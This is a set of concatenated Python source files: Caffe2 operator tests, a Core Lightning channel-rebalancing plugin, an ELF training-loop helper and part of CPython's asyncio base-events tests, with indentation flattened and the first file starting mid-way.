for t in range(T):
input_t = input[t].reshape(1, N, D)
hidden_t_prev = hidden[t].reshape(1, N, D)
gates = np.dot(hidden_t_prev, gates_w.T)
gates = gates.reshape(1, N, D) + input_t.reshape(1, N, D)
hidden[t + 1] = sigmoid(gates)
return hidden[1:], hidden, hidden[-1].reshape(1, N, D)
self.assertReferenceChecks(
hu.cpu_do,
op,
[workspace.FetchBlob(name)
for name in ["input", "seq_lengths", "gates_t_w", "gates_t_b",
"hidden_input"]],
reference,
outputs_to_check=[0, 1, 2])
for param in [0, 2, 3]:
self.assertGradientChecks(
hu.cpu_do,
op,
[workspace.FetchBlob(name)
for name in ["input", "seq_lengths", "gates_t_w", "gates_t_b",
"hidden_input"]],
param,
[0])
@given(n=st.integers(1, 5),
c=st.integers(1, 5),
h=st.integers(1, 5),
w=st.integers(1, 5),
pad=st.integers(0, 2),
block_size=st.integers(2, 3),
**hu.gcs)
def test_space_to_batch(self, n, c, h, w, pad, block_size, gc, dc):
assume((h + 2 * pad) % block_size == 0)
assume((w + 2 * pad) % block_size == 0)
X = np.random.randn(n, c, h, w).astype(np.float32)
op = core.CreateOperator("SpaceToBatch", ["X"], ["Y"],
pad=pad, block_size=block_size)
self.assertDeviceChecks(dc, op, [X], [0])
self.assertGradientChecks(gc, op, [X], 0, [0])
@given(n=st.integers(1, 5),
c=st.integers(1, 5),
h=st.integers(1, 5),
w=st.integers(1, 5),
pad=st.integers(0, 2),
block_size=st.integers(2, 3),
**hu.gcs)
def test_batch_to_space(self, n, c, h, w, pad, block_size, gc, dc):
assume((h + 2 * pad) % block_size == 0)
assume((w + 2 * pad) % block_size == 0)
X = np.random.randn(
n * block_size * block_size,
c,
(h + 2 * pad) // block_size,
(w + 2 * pad) // block_size).astype(np.float32)
op = core.CreateOperator("BatchToSpace", ["X"], ["Y"],
pad=pad, block_size=block_size)
self.assertDeviceChecks(dc, op, [X], [0])
self.assertGradientChecks(gc, op, [X], 0, [0])
@given(X=hu.tensor(),
in_place=st.booleans(),
scale=st.floats(min_value=-2.0, max_value=2.0),
**hu.gcs)
def test_scale(self, X, in_place, scale, gc, dc):
op = core.CreateOperator(
"Scale", ["X"], ["Y" if not in_place else "X"],
scale=scale)
self.assertDeviceChecks(dc, op, [X], [0])
self.assertGradientChecks(gc, op, [X], 0, [0])
@given(s=st.text())
def test_string_serde(self, s):
s = s.encode('ascii', 'ignore')
self.ws.create_blob("a").feed(s)
serialized = self.ws.blobs["a"].serialize("a")
self.ws.create_blob("b").deserialize(serialized)
self.assertEqual(s, self.ws.blobs[("a")].fetch())
self.assertEqual(s, self.ws.blobs[("b")].fetch())
@given(pad=st.integers(0, 3),
size=st.integers(1, 10),
input_channels=st.integers(1, 5),
batch_size=st.integers(1, 5),
order=st.sampled_from(["NCHW", "NHWC"]),
mode=st.sampled_from(["constant", "reflect", "edge"]),
**hu.gcs)
def test_same_pad_image(self, pad, size, input_channels, batch_size, order,
mode, gc, dc):
assume(size > pad)
op = core.CreateOperator(
"PadImage",
["X"],
["Y"],
pad=pad,
mode=mode,
order=order,
)
if order == "NHWC":
X = np.random.rand(
batch_size, size, size, input_channels).astype(np.float32) - 0.5
def numpy_pad_ref(x):
return (np.pad(
x, ((0, 0), (pad, pad), (pad, pad), (0, 0)), mode),)
else:
X = np.random.rand(
batch_size, input_channels, size, size).astype(np.float32) - 0.5
def numpy_pad_ref(x):
return (np.pad(
x, ((0, 0), (0, 0), (pad, pad), (pad, pad)), mode),)
self.assertReferenceChecks(gc, op, [X], numpy_pad_ref)
self.assertDeviceChecks(dc, op, [X], [0])
self.assertGradientChecks(gc, op, [X], 0, [0])
@given(pad_t=st.integers(0, 3),
pad_l=st.integers(0, 3),
pad_b=st.integers(0, 3),
pad_r=st.integers(0, 3),
size=st.integers(1, 10),
input_channels=st.integers(1, 5),
batch_size=st.integers(1, 5),
order=st.sampled_from(["NCHW", "NHWC"]),
mode=st.sampled_from(["constant", "reflect", "edge"]),
**hu.gcs)
def test_pad_image(self, pad_t, pad_l, pad_b, pad_r, size, input_channels,
batch_size, order, mode, gc, dc):
assume(size > max(pad_b, pad_r, pad_t, pad_l))
op = core.CreateOperator(
"PadImage",
["X"],
["Y"],
pad_t=pad_t,
pad_l=pad_l,
pad_b=pad_b,
pad_r=pad_r,
mode=mode,
order=order,
)
if order == "NHWC":
X = np.random.rand(
batch_size, size, size, input_channels).astype(np.float32) - 0.5
def numpy_pad_ref(x):
return (np.pad(
x, ((0, 0), (pad_t, pad_b), (pad_l, pad_r), (0, 0)),
mode),)
else:
X = np.random.rand(
batch_size, input_channels, size, size).astype(np.float32) - 0.5
def numpy_pad_ref(x):
return (np.pad(
x, ((0, 0), (0, 0), (pad_t, pad_b), (pad_l, pad_r)),
mode),)
self.assertReferenceChecks(gc, op, [X], numpy_pad_ref)
self.assertDeviceChecks(dc, op, [X], [0])
self.assertGradientChecks(gc, op, [X], 0, [0])
@given(size=st.integers(7, 10),
input_channels=st.integers(1, 10),
batch_size=st.integers(1, 3),
order=st.sampled_from(["NCHW", "NHWC"]),
epsilon=st.floats(min_value=1e-4, max_value=1e-2),
**hu.gcs_cpu_only)
def test_instance_norm(self, size, input_channels, batch_size, order,
epsilon, gc, dc):
op = core.CreateOperator(
"InstanceNorm",
["X", "scale", "bias"],
["Y"],
order=order,
epsilon=epsilon,
)
np.random.seed(1701)
scale = np.random.rand(input_channels).astype(np.float32) + 0.5
bias = np.random.rand(input_channels).astype(np.float32) - 0.5
X = np.random.rand(
batch_size, input_channels, size, size).astype(np.float32) - 0.5
if order == "NHWC":
X = X.swapaxes(1, 2).swapaxes(2, 3)
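        # Reference: normalize each (sample, channel) slice to zero mean and
        # unit variance over the spatial positions, then apply the
        # per-channel scale and bias; the NHWC variant transposes to NCHW
        # and back.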
def ref_nchw(x, scale, bias):
x = x.reshape(batch_size * input_channels, size * size)
y = (x - x.mean(1)[:, np.newaxis])
y /= np.sqrt(x.var(1) + epsilon)[:, np.newaxis]
y = y.reshape(batch_size, input_channels, size, size)
y = y * scale.reshape(1, input_channels, 1, 1)
y = y + bias.reshape(1, input_channels, 1, 1)
return (y, )
def ref_nhwc(x, scale, bias):
x = x.swapaxes(2, 3).swapaxes(1, 2)
y = ref_nchw(x, scale, bias)[0]
return (y.swapaxes(1, 2).swapaxes(2, 3), )
self.assertReferenceChecks(
gc, op, [X, scale, bias],
ref_nchw if order == "NCHW" else ref_nhwc)
# TODO(jiayq): when there are backward and GPU implementations, enable
# these two.
# self.assertDeviceChecks(dc, op, [X, scale, bias], [0])
# self.assertGradientChecks(gc, op, [X, scale, bias], 0, [0])
ws = workspace.C.Workspace()
feeds = [("X", X), ("scale", scale), ("bias", bias)]
for blob, arr in feeds:
ws.create_blob(blob).feed(arr)
for _ in range(100):
ws.run(op)
for blob, arr in feeds:
np.testing.assert_array_equal(ws.blobs[blob].fetch(), arr)
@given(sizes=st.lists(st.integers(1, 100), min_size=1),
in_place=st.booleans(),
**hu.gcs)
def test_unsafe_coalesce(self, sizes, in_place, gc, dc):
gAlignment = 32
Xs = [np.random.randn(size)
.astype(np.random.choice([np.float32, np.float64, np.uint8]))
for size in sizes]
op = core.CreateOperator(
"UnsafeCoalesce",
["X_{}".format(i) for i, _ in enumerate(sizes)],
[("X_{}" if in_place else "Y_{}").format(i)
for i, _ in enumerate(sizes)] + ["coalesced"])
self.assertDeviceChecks(dc, op, Xs, list(range(len(sizes) + 1)))
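        # The reference pads every tensor's byte size up to the assumed
        # 32-byte alignment (gAlignment) and concatenates the raw bytes, so
        # "coalesced" is checked as one flat uint8 buffer.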
def unsafe_coalesce(*xs):
def to_uint8(x):
x_aligned_bytes = ((x.nbytes + gAlignment - 1) // gAlignment) \
* gAlignment
x_aligned = np.zeros(
shape=(x_aligned_bytes // x.dtype.itemsize, ),
dtype=x.dtype)
x_aligned[:x.size] = x
x_cast = np.fromstring(x_aligned.tobytes(), dtype='<u1')
return x_cast
flat = [to_uint8(x) for x in xs]
coalesced = np.concatenate(flat)
return list(xs) + [coalesced]
self.assertReferenceChecks(gc, op, Xs, unsafe_coalesce)
@given(inp=_dtypes().flatmap(lambda dt: _tensor_and_indices(
elements=st.floats(min_value=0, max_value=1), dtype=dt)),
**hu.gcs)
def test_sparse_to_dense(self, inp, gc, dc):
first_dim, X, I = inp
if X.dtype != np.dtype('float32') and gc.device_type == 1:
            # CUDA only supports 32-bit float
print("Bailout {}".format(X.dtype))
return
if gc.device_type == 1:
            # The CUDA version only supports int32
I = I.astype(np.int32)
# values don't matter
D = np.zeros((first_dim,) + X.shape[1:]).astype(X.dtype)
op = core.CreateOperator("SparseToDense", ["I", "X", "D"], ["Y"])
def sparse_to_dense(I, X, D):
O = np.zeros(D.shape)
for i, p in enumerate(I):
O[p] += X[i]
return [O]
self.assertReferenceChecks(gc, op, [I, X, D], sparse_to_dense)
X = X.astype(np.float32)
self.assertGradientChecks(gc, op, [I, X, D], 1, [0])
@given(inputs=hu.tensors(n=2, min_dim=2, max_dim=2), **hu.gcs_cpu_only)
def test_dot_product(self, inputs, gc, dc):
X, Y = inputs
op = core.CreateOperator("DotProduct", ["X", "Y"], 'out')
def dotproduct(X, Y):
return (np.sum(X * Y, axis=1), )
self.assertReferenceChecks(gc, op, [X, Y], dotproduct)
self.assertDeviceChecks(dc, op, [X, Y], [0])
self.assertGradientChecks(gc, op, [X, Y], 0, [0])
self.assertGradientChecks(gc, op, [X, Y], 1, [0])
@given(N=st.integers(min_value=2, max_value=10),
M=st.integers(min_value=2, max_value=10),
K=st.integers(min_value=2, max_value=10),
pad_value=st.floats(min_value=0.1, max_value=1.0),
**hu.gcs_cpu_only)
def test_dot_product_with_padding(self, N, M, K, pad_value, gc, dc):
X = np.random.rand(N, M).astype(np.float32) - 0.5
Y = np.random.rand(N, K).astype(np.float32) - 0.5
op = core.CreateOperator("DotProductWithPadding", ["X", "Y"], 'out',
pad_value=pad_value)
def dotproduct(X, Y):
Z = np.ones((N, max(M, K))).astype(np.float32) * pad_value
if M < K:
Z[:, :M] = X
return (np.sum(Z * Y, axis=1), )
else:
Z[:, :K] = Y
return (np.sum(Z * X, axis=1), )
self.assertReferenceChecks(gc, op, [X, Y], dotproduct)
self.assertDeviceChecks(dc, op, [X, Y], [0])
self.assertGradientChecks(gc, op, [X, Y], 0, [0])
self.assertGradientChecks(gc, op, [X, Y], 1, [0])
@given(N=st.integers(min_value=2, max_value=10),
M=st.integers(min_value=2, max_value=10),
pad_value=st.floats(min_value=0.1, max_value=1.0),
**hu.gcs_cpu_only)
def test_dot_product_with_rep_padding(self, N, M, pad_value, gc, dc):
K = 2 * M
X = np.random.rand(N, M).astype(np.float32) - 0.5
Y = np.random.rand(N, K).astype(np.float32) - 0.5
op = core.CreateOperator("DotProductWithPadding", ["X", "Y"], 'out',
replicate=True,
pad_value=pad_value)
def dotproduct(X, Y):
import numpy.matlib as npm
if M < K:
Z = npm.repmat(X, 1, K // M)
return (np.sum(Z * Y, axis=1), )
else:
Z = npm.repmat(Y, 1, M // K)
return (np.sum(Z * X, axis=1), )
self.assertReferenceChecks(gc, op, [X, Y], dotproduct)
self.assertDeviceChecks(dc, op, [X, Y], [0])
self.assertGradientChecks(gc, op, [X, Y], 0, [0])
self.assertGradientChecks(gc, op, [X, Y], 1, [0])
@given(N=st.integers(min_value=2, max_value=10),
M=st.integers(min_value=2, max_value=10), **hu.gcs_cpu_only)
def test_ensure_dense(self, N, M, gc, dc):
# in place
X = np.random.rand(N, M).astype(np.float32) - 0.5
op = core.CreateOperator("EnsureDense", ["X"], "X")
self.assertReferenceChecks(gc, op, [X], lambda x: [x])
self.assertDeviceChecks(dc, op, [X], [0])
# or not
X = np.random.rand(N, M).astype(np.float32) - 0.5
op = core.CreateOperator("EnsureDense", ["X"], "out")
self.assertReferenceChecks(gc, op, [X], lambda x: [x])
self.assertDeviceChecks(dc, op, [X], [0])
@given(N=st.integers(min_value=10, max_value=100),
M=st.integers(min_value=2, max_value=10),
num_buckets=st.integers(min_value=1, max_value=5),
**hu.gcs_cpu_only)
def test_accumulate_histogram_op(self, N, M, num_buckets, gc, dc):
X = np.random.rand(N, M).astype(np.float32)
lower_bound, upper_bound = 0.1, 0.9
op = core.CreateOperator("AccumulateHistogram", ["X"],
['cur_hist', 'acc_hist'],
lower_bound=lower_bound,
upper_bound=upper_bound,
num_buckets=num_buckets)
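        # Bucketing convention used by the reference: bucket 0 collects
        # values below lower_bound, bucket num_buckets + 1 collects values at
        # or above upper_bound, and the interior buckets split
        # [lower_bound, upper_bound) into num_buckets equal segments.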
def histogram(X):
hist = np.zeros((num_buckets + 2, ), dtype=np.int32)
segment = (upper_bound - lower_bound) / num_buckets
Y = np.zeros((N, M), dtype=np.int32)
Y[X < lower_bound] = 0
Y[X >= upper_bound] = num_buckets + 1
Y[(X >= lower_bound) & (X < upper_bound)] = \
((X[(X >= lower_bound) & (X < upper_bound)] - lower_bound) /
segment + 1).astype(np.int32)
for i in range(Y.shape[0]):
for j in range(Y.shape[1]):
hist[Y[i][j]] += 1
cur_hist, acc_hist = hist, hist
return [cur_hist, acc_hist]
self.assertDeviceChecks(dc, op, [X], [0, 1])
self.assertReferenceChecks(gc, op, [X], histogram)
if __name__ == "__main__":
unittest.main()
|
jitrebalance.py
|
#!/usr/bin/env python3
from math import ceil
from pyln.client import Plugin, Millisatoshi, RpcError
import binascii
import hashlib
import secrets
import threading
import time
plugin = Plugin()
def get_reverse_chan(scid, chan):
for c in plugin.rpc.listchannels(scid)['channels']:
if c['channel_flags'] != chan['direction']:
return c
return None
def get_circular_route(scid, chan, amt, peer, exclusions, request):
"""Compute a circular route with `scid` as last leg.
"""
# Compute the last leg of the route first, so we know the parameters to
# traverse that last edge.
reverse_chan = get_reverse_chan(scid, chan)
if reverse_chan is None:
plugin.log("Could not compute parameters for the last hop")
return None
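    # The final hop charges base_fee_millisatoshi plus fee_per_millionth of
    # the forwarded amount, so the node right before our channel must receive
    # `amt` plus that fee; 9 blocks (the plugin's assumed final CLTV delta)
    # plus the channel's `delay` gives the CLTV for that hop.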
last_amt = ceil(float(amt) +
float(amt) * reverse_chan['fee_per_millionth'] / 10**6 +
reverse_chan['base_fee_millisatoshi'])
last_cltv = 9 + reverse_chan['delay']
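    # Illustrative arithmetic only (made-up channel parameters, not from any
    # real node): with amt=1_000_000 msat, fee_per_millionth=10 and
    # base_fee_millisatoshi=1000, last_amt = ceil(1_000_000 + 10 + 1_000)
    # = 1_001_010 msat, i.e. we ask getroute for the amount plus the routing
    # fee charged by the final hop we append manually below.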
try:
route = plugin.rpc.getroute(
node_id=peer['id'],
msatoshi=last_amt,
riskfactor=1,
exclude=exclusions,
cltv=last_cltv,
)['route']
# Append the last hop we computed manually above
route += [{
'id': plugin.node_id,
'channel': scid,
'direction': chan['direction'],
'msatoshi': amt,
'amount_msat': '{}msat'.format(amt),
'delay': 9
}]
return route
except RpcError:
plugin.log("Could not get a route, no remaining one? Exclusions : {}"
.format(exclusions))
return None
def try_rebalance(scid, chan, amt, peer, request):
# Exclude the channel we are trying to rebalance when searching for a
# path. We will manually append it to the route and bump the other
# parameters so it can be used afterwards
exclusions = [
"{scid}/{direction}".format(scid=scid, direction=chan['direction'])
]
# Try as many routes as possible before the timeout expires
stop_time = int(time.time()) + plugin.rebalance_timeout
while int(time.time()) <= stop_time:
route = get_circular_route(scid, chan, amt, peer, exclusions, request)
# We exhausted all the possibilities, Game Over
if route is None:
request.set_result({"result": "continue"})
return
        # We're about to initiate a rebalancing, so we'd better remember how
        # we can settle it once we see it back here.
payment_key = secrets.token_bytes(32)
payment_hash = hashlib.sha256(payment_key).hexdigest()
plugin.rebalances[payment_hash] = {
"payment_key": binascii.hexlify(payment_key).decode('ASCII'),
"payment_hash": payment_hash,
"request": request,
}
# After all this work we're finally in a position to judge whether a
# rebalancing is worth it at all. The rebalancing is considered worth it
# if the fees we're about to pay are less than or equal to the fees we get
# out of forwarding the payment.
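    # A minimal sketch of that comparison (hypothetical bookkeeping, not wired
    # into this plugin): the cost of the circular route is the first-hop
    # amount minus the amount delivered back to us, e.g.
    # rebalance_fee = route[0]['msatoshi'] - amt, while the income is the fee
    # we would earn for forwarding the original HTLC; the rebalance is worth
    # it when rebalance_fee <= expected_forward_fee.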
plugin.log("Sending rebalance request using payment_hash={}, route={}".format(
payment_hash, route
))
try:
plugin.rpc.sendpay(route, payment_hash)
# If the attempt is successful, we acknowledged it on the
            # receiving end (a couple of lines above), so we leave it dangling
# here.
if (plugin.rpc.waitsendpay(payment_hash).get("status")
== "complete"):
plugin.log("Succesfully re-filled outgoing capacity in {},"
"payment_hash={}".format(scid, payment_hash))
return
except RpcError as e:
error = e.error['data']
            # The erring_channel field may be missing (shouldn't happen) or
            # may be "0x0x0"
erring_channel = error.get('erring_channel', '0x0x0')
if erring_channel != '0x0x0':
if erring_channel == scid:
break
erring_direction = error['erring_direction']
exclusions.append("{}/{}".format(erring_channel,
erring_direction))
plugin.log("Excluding {} due to a failed attempt"
.format(erring_channel))
plugin.log("Timed out while trying to rebalance")
request.set_result({"result": "continue"})
def get_peer_and_channel(peers, scid):
"""Look for the channel identified by {scid} in our list of {peers}"""
for peer in peers:
for channel in peer["channels"]:
if channel.get("short_channel_id") == scid:
return (peer, channel)
return (None, None)
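# Illustrative use (hypothetical scid, mirroring the call in the hook below):
#   peers = plugin.rpc.listpeers()['peers']
#   peer, chan = get_peer_and_channel(peers, '632x1x0')
#   # -> the owning peer dict and its channel entry, or (None, None) if the
#   #    scid does not belong to one of our channels.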
@plugin.async_hook("htlc_accepted")
def on_htlc_accepted(htlc, onion, plugin, request, **kwargs):
plugin.log("Got an incoming HTLC htlc={}".format(htlc))
# The HTLC might be a rebalance we ourselves initiated, better check
# against the list of pending ones.
rebalance = plugin.rebalances.get(htlc['payment_hash'], None)
if rebalance is not None:
# Settle the rebalance, before settling the request that initiated the
# rebalance.
request.set_result({
"result": "resolve",
"payment_key": rebalance['payment_key']
})
# Now wait for it to settle correctly
plugin.rpc.waitsendpay(htlc['payment_hash'])
rebalance['request'].set_result({"result": "continue"})
# Clean up our stash of active rebalancings.
del plugin.rebalances[htlc['payment_hash']]
return
# Check to see if the next channel has sufficient capacity
scid = onion['short_channel_id'] if 'short_channel_id' in onion else '0x0x0'
# Are we the destination? Then there's nothing to do. Continue.
if scid == '0x0x0':
request.set_result({"result": "continue"})
return
# Locate the channel + direction that would be the next in the path
peers = plugin.rpc.listpeers()['peers']
peer, chan = get_peer_and_channel(peers, scid)
    if peer is None or chan is None:
        request.set_result({"result": "continue"})
        return
# Check if the channel is active and routable, otherwise there's little
# point in even trying
if not peer['connected'] or chan['state'] != "CHANNELD_NORMAL":
request.set_result({"result": "continue"})
return
# Need to consider who the funder is, since they are paying the fees.
# TODO If we are the funder we need to take the cost of an HTLC into
# account as well.
# funder = chan['msatoshi_to_us_max'] == chan['msatoshi_total']
forward_amt = Millisatoshi(onion['forward_amount'])
# If we have enough capacity just let it through now. Otherwise the
# Millisatoshi raises an error for negative amounts in the calculation
# below.
if forward_amt < chan['spendable_msat']:
request.set_result({"result": "continue"})
return
    # Compute the amount we need to rebalance, giving ourselves a bit of
    # breathing room while we're at it (25% more than strictly necessary) so we
# don't end up with a completely unbalanced channel right away again, and
# to account for a bit of fuzziness when it comes to dipping into the
# reserve.
amt = ceil(int(forward_amt - chan['spendable_msat']) * 1.25)
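    # Worked example with illustrative numbers: forward_amt = 1_200_000 msat
    # and spendable_msat = 1_000_000 msat leaves a 200_000 msat shortfall, so
    # amt = ceil(200_000 * 1.25) = 250_000 msat is rebalanced in.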
# If we have a higher balance than is required we don't need to rebalance,
# just stop here.
if amt <= 0:
request.set_result({"result": "continue"})
return
t = threading.Thread(target=try_rebalance, args=(scid, chan, amt, peer, request))
t.daemon = True
t.start()
@plugin.init()
def init(options, configuration, plugin):
plugin.log("jitrebalance.py initializing {}".format(configuration))
plugin.node_id = plugin.rpc.getinfo()['id']
# FIXME: this int() shouldn't be needed: check if this is pyln's or
# lightningd's fault.
plugin.rebalance_timeout = int(options.get("jitrebalance-try-timeout"))
# Set of currently active rebalancings, keyed by their payment_hash
plugin.rebalances = {}
plugin.add_option(
"jitrebalance-try-timeout",
60,
"Number of seconds before we stop trying to rebalance a channel.",
opt_type="int"
)
plugin.run()
|
single_process.py
|
# Copyright (c) 2017-present, Facebook, Inc.
# All rights reserved.
#
# This source code is licensed under the BSD-style license found in the
# LICENSE file in the root directory of this source tree.
from ..args_provider import ArgsProvider
import threading
import tqdm
class SingleProcessRun:
def __init__(self):
''' Initialization for SingleProcessRun. Accepted arguments:
``num_minibatch``,
``num_episode``,
``tqdm``
'''
self.args = ArgsProvider(
call_from = self,
define_args = [
("num_minibatch", 5000),
("num_episode", 10000),
("tqdm", dict(action="store_true")),
]
)
def setup(self, GC, episode_start=None, episode_summary=None):
''' Setup for SingleProcessRun.
Args:
GC(`GameContext`): Game Context
episode_start(func): operations to perform before each episode
            episode_summary(func): operations to summarize after each episode
'''
self.GC = GC
self.episode_summary = episode_summary
self.episode_start = episode_start
def run(self):
        ''' Main training loop. Initialize the Game Context and loop over the required episodes.
Call episode_start and episode_summary before and after each episode if necessary.
Visualize with a progress bar if ``tqdm`` is set.
Print training stats after each episode.
In the end, print summary for game context and stop it.
'''
self.GC.Start()
args = self.args
for k in range(args.num_episode):
if self.episode_start is not None:
self.episode_start(k)
if args.tqdm: iterator = tqdm.trange(args.num_minibatch, ncols=50)
else: iterator = range(args.num_minibatch)
for i in iterator:
# import pdb
# pdb.set_trace()
self.GC.Run()
if self.episode_summary is not None:
self.episode_summary(k)
self.GC.PrintSummary()
self.GC.Stop()
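    # Hypothetical usage sketch (the GameContext construction is elided and
    # the names below are illustrative only):
    #   runner = SingleProcessRun()
    #   runner.setup(GC, episode_summary=lambda k: print("episode", k, "done"))
    #   runner.run()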
def run_multithread(self):
''' Start training in a multithreaded environment '''
def train_thread():
args = self.args
for i in range(args.num_episode):
for k in range(args.num_minibatch):
if self.episode_start is not None:
self.episode_start(k)
if k % 500 == 0:
print("Receive minibatch %d/%d" % (k, args.num_minibatch))
self.GC.RunGroup("train")
# Print something.
self.episode_summary(i)
def actor_thread():
while True:
self.GC.RunGroup("actor")
self.GC.Start()
# Start the two threads.
train_th = threading.Thread(target=train_thread)
actor_th = threading.Thread(target=actor_thread)
train_th.start()
actor_th.start()
train_th.join()
actor_th.join()
|
test_base_events.py
|
"""Tests for base_events.py"""
import errno
import logging
import math
import os
import socket
import sys
import threading
import time
import unittest
from unittest import mock
import asyncio
from asyncio import base_events
from asyncio import constants
from asyncio import events
from test.test_asyncio import utils as test_utils
from test import support
from test.support.script_helper import assert_python_ok
MOCK_ANY = mock.ANY
PY34 = sys.version_info >= (3, 4)
def mock_socket_module():
m_socket = mock.MagicMock(spec=socket)
for name in (
'AF_INET', 'AF_INET6', 'AF_UNSPEC', 'IPPROTO_TCP', 'IPPROTO_UDP',
'SOCK_STREAM', 'SOCK_DGRAM', 'SOL_SOCKET', 'SO_REUSEADDR', 'inet_pton'
):
if hasattr(socket, name):
setattr(m_socket, name, getattr(socket, name))
else:
delattr(m_socket, name)
m_socket.socket = mock.MagicMock()
m_socket.socket.return_value = test_utils.mock_nonblocking_socket()
m_socket.getaddrinfo._is_coroutine = False
return m_socket
def patch_socket(f):
return mock.patch('asyncio.base_events.socket',
new_callable=mock_socket_module)(f)
class BaseEventTests(test_utils.TestCase):
def test_ipaddr_info(self):
UNSPEC = socket.AF_UNSPEC
INET = socket.AF_INET
INET6 = socket.AF_INET6
STREAM = socket.SOCK_STREAM
DGRAM = socket.SOCK_DGRAM
TCP = socket.IPPROTO_TCP
UDP = socket.IPPROTO_UDP
self.assertEqual(
(INET, STREAM, TCP, '', ('1.2.3.4', 1)),
base_events._ipaddr_info('1.2.3.4', 1, INET, STREAM, TCP))
self.assertEqual(
(INET, STREAM, TCP, '', ('1.2.3.4', 1)),
base_events._ipaddr_info(b'1.2.3.4', 1, INET, STREAM, TCP))
self.assertEqual(
(INET, STREAM, TCP, '', ('1.2.3.4', 1)),
base_events._ipaddr_info('1.2.3.4', 1, UNSPEC, STREAM, TCP))
self.assertEqual(
(INET, DGRAM, UDP, '', ('1.2.3.4', 1)),
base_events._ipaddr_info('1.2.3.4', 1, UNSPEC, DGRAM, UDP))
# Socket type STREAM implies TCP protocol.
self.assertEqual(
(INET, STREAM, TCP, '', ('1.2.3.4', 1)),
base_events._ipaddr_info('1.2.3.4', 1, UNSPEC, STREAM, 0))
# Socket type DGRAM implies UDP protocol.
self.assertEqual(
(INET, DGRAM, UDP, '', ('1.2.3.4', 1)),
base_events._ipaddr_info('1.2.3.4', 1, UNSPEC, DGRAM, 0))
# No socket type.
self.assertIsNone(
base_events._ipaddr_info('1.2.3.4', 1, UNSPEC, 0, 0))
# IPv4 address with family IPv6.
self.assertIsNone(
base_events._ipaddr_info('1.2.3.4', 1, INET6, STREAM, TCP))
self.assertEqual(
(INET6, STREAM, TCP, '', ('::3', 1, 0, 0)),
base_events._ipaddr_info('::3', 1, INET6, STREAM, TCP))
self.assertEqual(
(INET6, STREAM, TCP, '', ('::3', 1, 0, 0)),
base_events._ipaddr_info('::3', 1, UNSPEC, STREAM, TCP))
# IPv6 address with family IPv4.
self.assertIsNone(
base_events._ipaddr_info('::3', 1, INET, STREAM, TCP))
# IPv6 address with zone index.
self.assertIsNone(
base_events._ipaddr_info('::3%lo0', 1, INET6, STREAM, TCP))
def test_port_parameter_types(self):
# Test obscure kinds of arguments for "port".
INET = socket.AF_INET
STREAM = socket.SOCK_STREAM
TCP = socket.IPPROTO_TCP
self.assertEqual(
(INET, STREAM, TCP, '', ('1.2.3.4', 0)),
base_events._ipaddr_info('1.2.3.4', None, INET, STREAM, TCP))
self.assertEqual(
(INET, STREAM, TCP, '', ('1.2.3.4', 0)),
base_events._ipaddr_info('1.2.3.4', b'', INET, STREAM, TCP))
self.assertEqual(
(INET, STREAM, TCP, '', ('1.2.3.4', 0)),
base_events._ipaddr_info('1.2.3.4', '', INET, STREAM, TCP))
self.assertEqual(
(INET, STREAM, TCP, '', ('1.2.3.4', 1)),
base_events._ipaddr_info('1.2.3.4', '1', INET, STREAM, TCP))
self.assertEqual(
(INET, STREAM, TCP, '', ('1.2.3.4', 1)),
base_events._ipaddr_info('1.2.3.4', b'1', INET, STREAM, TCP))
@patch_socket
def test_ipaddr_info_no_inet_pton(self, m_socket):
del m_socket.inet_pton
self.assertIsNone(base_events._ipaddr_info('1.2.3.4', 1,
socket.AF_INET,
socket.SOCK_STREAM,
socket.IPPROTO_TCP))
class BaseEventLoopTests(test_utils.TestCase):
def setUp(self):
super().setUp()
self.loop = base_events.BaseEventLoop()
self.loop._selector = mock.Mock()
self.loop._selector.select.return_value = ()
self.set_event_loop(self.loop)
def test_not_implemented(self):
m = mock.Mock()
self.assertRaises(
NotImplementedError,
self.loop._make_socket_transport, m, m)
self.assertRaises(
NotImplementedError,
self.loop._make_ssl_transport, m, m, m, m)
self.assertRaises(
NotImplementedError,
self.loop._make_datagram_transport, m, m)
self.assertRaises(
NotImplementedError, self.loop._process_events, [])
self.assertRaises(
NotImplementedError, self.loop._write_to_self)
self.assertRaises(
NotImplementedError,
self.loop._make_read_pipe_transport, m, m)
self.assertRaises(
NotImplementedError,
self.loop._make_write_pipe_transport, m, m)
gen = self.loop._make_subprocess_transport(m, m, m, m, m, m, m)
with self.assertRaises(NotImplementedError):
gen.send(None)
def test_close(self):
self.assertFalse(self.loop.is_closed())
self.loop.close()
self.assertTrue(self.loop.is_closed())
# it should be possible to call close() more than once
self.loop.close()
self.loop.close()
# operation blocked when the loop is closed
f = asyncio.Future(loop=self.loop)
self.assertRaises(RuntimeError, self.loop.run_forever)
self.assertRaises(RuntimeError, self.loop.run_until_complete, f)
def test__add_callback_handle(self):
h = asyncio.Handle(lambda: False, (), self.loop, None)
self.loop._add_callback(h)
self.assertFalse(self.loop._scheduled)
self.assertIn(h, self.loop._ready)
def test__add_callback_cancelled_handle(self):
h = asyncio.Handle(lambda: False, (), self.loop, None)
h.cancel()
self.loop._add_callback(h)
self.assertFalse(self.loop._scheduled)
self.assertFalse(self.loop._ready)
def test_set_default_executor(self):
executor = mock.Mock()
self.loop.set_default_executor(executor)
self.assertIs(executor, self.loop._default_executor)
def test_call_soon(self):
def cb():
pass
h = self.loop.call_soon(cb)
self.assertEqual(h._callback, cb)
self.assertIsInstance(h, asyncio.Handle)
self.assertIn(h, self.loop._ready)
def test_call_soon_non_callable(self):
self.loop.set_debug(True)
with self.assertRaisesRegex(TypeError, 'a callable object'):
self.loop.call_soon(1)
def test_call_later(self):
def cb():
pass
h = self.loop.call_later(10.0, cb)
self.assertIsInstance(h, asyncio.TimerHandle)
self.assertIn(h, self.loop._scheduled)
self.assertNotIn(h, self.loop._ready)
def test_call_later_negative_delays(self):
calls = []
def cb(arg):
calls.append(arg)
self.loop._process_events = mock.Mock()
self.loop.call_later(-1, cb, 'a')
self.loop.call_later(-2, cb, 'b')
test_utils.run_briefly(self.loop)
self.assertEqual(calls, ['b', 'a'])
def test_time_and_call_at(self):
def cb():
self.loop.stop()
self.loop._process_events = mock.Mock()
delay = 0.1
when = self.loop.time() + delay
self.loop.call_at(when, cb)
t0 = self.loop.time()
self.loop.run_forever()
dt = self.loop.time() - t0
# 50 ms: maximum granularity of the event loop
self.assertGreaterEqual(dt, delay - 0.050, dt)
# tolerate a difference of +800 ms because some Python buildbots
# are really slow
self.assertLessEqual(dt, 0.9, dt)
def check_thread(self, loop, debug):
def cb():
pass
loop.set_debug(debug)
if debug:
msg = ("Non-thread-safe operation invoked on an event loop other "
"than the current one")
with self.assertRaisesRegex(RuntimeError, msg):
loop.call_soon(cb)
